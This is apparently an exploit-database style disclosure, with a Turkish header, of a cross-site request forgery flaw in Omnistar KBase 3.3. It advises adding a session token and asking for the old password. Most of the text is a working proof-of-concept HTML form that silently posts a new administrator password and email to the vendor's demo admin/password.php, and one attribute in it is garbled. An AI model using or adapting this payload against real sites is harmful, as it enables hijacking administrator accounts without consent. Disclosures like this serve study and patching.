< ------------------- header data start ------------------- >

#############################################################

# Application Name :Omnistar KBase

# Version : 3.3

# vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak admin bilgileri degistirebilinir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://www.mywebetools.com/demo_kb1/admin/password.php method=post><table width=722 border=1 cellpadding=0 cellspacing=0 bordercolor=#CCCCCC style=’border-collapse:collapse;’>
<tr valign=top>
<td height=21 align=center valign=middle nowrap background=../images/title_bg.jpg class=Arial12Grey><div align=left><b>Administrative password</b></div></td>

</tr>
</table>
<table width=100% border=0 cellspacing=0 cellpadding=0>
<tr>
<td><img src=../images/spacer.gif width=1 height=1></td>
</tr>
</table>
<table width=722 border=1 cellpadding=5 cellspacing=0 bordercolor=#CCCCCC style=’border-collapse:collapse;’><tr bgcolor=#f4f4f4><td class=Arial11Grey> New password: </td><td class=Arial11Blue><input type=password name=’f_password’ value= ></td></tr>

<tr bgcolor=#f4f4f4><td class=Arial11Grey> Confirm password: </td><td class=Arial11Blue><input type=password name=’f_password2’ value= ></td></tr>
<tr bgcolor=#f4f4f4><td class=Arial11Grey> Email: </td><td class=Arial11Blue><input type=text name=’f_email’ value=[email protected] ></td></tr>
<tr bgcolor=#f4f4f4><td class=Arial11Grey> Send notification of expired articles: </td><td class=Arial11Blue><input type=checkbox name=’f_notify’ value=’1’ checked ></td></tr>
<tr bgcolor=f4f4f4><td colspan=2 class=Arial11Grey align=left><input type=image name=check Yasak Kelime#146;../images/update.jpg’ border=0>
<input type=hidden name=check value=’update’></td></tr>
</table></form>

< -- bug code end of -- >